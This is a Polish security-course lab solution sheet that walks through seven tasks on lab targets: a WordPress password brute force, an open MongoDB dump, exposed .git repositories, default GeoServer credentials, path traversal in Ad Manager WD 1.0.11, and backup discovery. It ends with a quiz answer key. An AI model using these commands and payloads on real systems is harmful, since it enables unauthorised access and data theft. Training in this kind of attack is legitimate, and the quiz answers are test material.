# ![PJATK](../../.assets/banner.png)

**Zadanie 1: Publicznie dostępny panel administracyjny** \
Wykonaj atak typu brute force w celu uzyskania dostępu do panelu użytkownika strony. W tym celu możesz użyć narzędzia wpscan oraz pliku z 10 tysiącami najpopularniejszych haseł 

```
wpscan --url http://<IP> -U CyberSkiller -P 10k-most-common.txt
http://<IP>/wp-login.php <-- wpisz hasło
```

**Zadanie 2: Niebezpieczna konfiguracja serwera bazy danych** \
Z wykorzystaniem narzędzi klienckich do połączeń z bazami MongoDB połącz się do niezabezpieczonego serwera MongoDB oraz wydobądź z odpowiedniej kolekcji odpowiedź do zadania.

```
sudo apt install mongo-tools
mongodump -h <IP>
cat ./dump/admin/exercise_flag.bson
```

**Zadanie 3: Publicznie dostępny serwer deweloperski** \
Deweloperzy usuwając pliki strony z serwera zapomnieli o ukrytym folderze .git, w którym znajduje się repozytorium strony WWW. Przeszukaj repozytorium w celu odnalezienia pliku, który będzie zawierał odpowiedź do zadania.

```
wget -r http://<IP>/.git/
cd <IP>
git log (id ostatniego commita)
git checkout <id commita>
cat secret.txt 
```

**Zadanie 4: Wykorzystanie domyślnych haseł** \
Administrator instalując aplikację, nie zadbał o zmianę domyślnych haseł dostępowych. Zaloguj się za pomocą tych, a następnie odwiedź zakładkę z logami serwera w celu uzyskania odpowiedzi na zadanie.

```
user: admin pass: geoserver
W GeoServer Logs jest odpowiedz
```

**Zadanie 5: Nieaktualne oprogramowanie ze znanymi podatnościami** \
Administrator nie zadbał o zaktualizowanie aplikacji pozostawiając podatną wtyczkę na stronie: WordPress Plugin Ad Manager WD 1.0.11

Wykorzystaj podatność wtyczki w celu odczytania odpowiedzi na zadanie, zawartej w pliku secret.txt, znajdującej się w katalogu nadrzędnym w stosunku do głównego katalogu instancji Wordpress.

```
<IP>/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../../secret.txt
```

**Zadanie 6: Publicznie dostępny backup** \
Wiesz, że plik secret.txt znajduje się w jednym z podkatalogów katalogu głównego serwera. Wykorzystując fakt, że administratorzy nie zadbali o usunięcie ze strony starych backupów, zdobądź treść pliku secret.txt.

```
gobuster dir -u  http://<IP>/backups/ -w /usr/share/dirb/wordlists/common.txt -x zip
```

**Zadanie 7: Przegląd udostępnionego repozytorium kodu** \
Wiesz, że plik secret.txt znajduje się w jednym z podkatalogów katalogu głównego serwera. Wykorzystując fakt, że administratorzy podczas wdrożenia zapomnieli usunąć repozytorium git, zdobądź treść pliku secret.txt.

```
https://github.com/internetwache/GitTools.git
cd ./GitTools-master/Dumper
./gitdumper.sh http://10.0.29.151/.git/ ./git-repo/
cd git-repo
git checkout .
cat secrets/secret.txt
```

**Test sprawdzający**:

**Która z poniższych informacji o dowolnym serwisie może prowadzić do odnalezienia luki bezpieczeństwa w oprogramowaniu?** \
Wersja serwisu

**Oceń prawdziwość zdania. Większość domyślnych konfiguracji dostarczanych w oprogramowaniu jest odpowiednio zabezpieczona i przeznaczona na serwery produkcyjne.** \
Fałsz

**Bazy danych MySQL posiadają domyślnie konto użytkownika root bez zabezpieczenia w postaci hasła, a dostęp do bazy inny niż lokalny jest domyślnie zablokowany. Czy taka konfiguracja jest bezpieczna?** \
Fałsz

**Oceń prawdziwość zdania. Aktualizacja oprogramowania jest ważnym elementem w aspekcie bezpieczeństwa aplikacji.** \
Prawda

**Oceń prawdziwość zdania. Uruchamiając nowy router ustawienie protokółu zabezpieczającego sieć WiFi jest wystarczającą konfiguracją routera.** \
Fałsz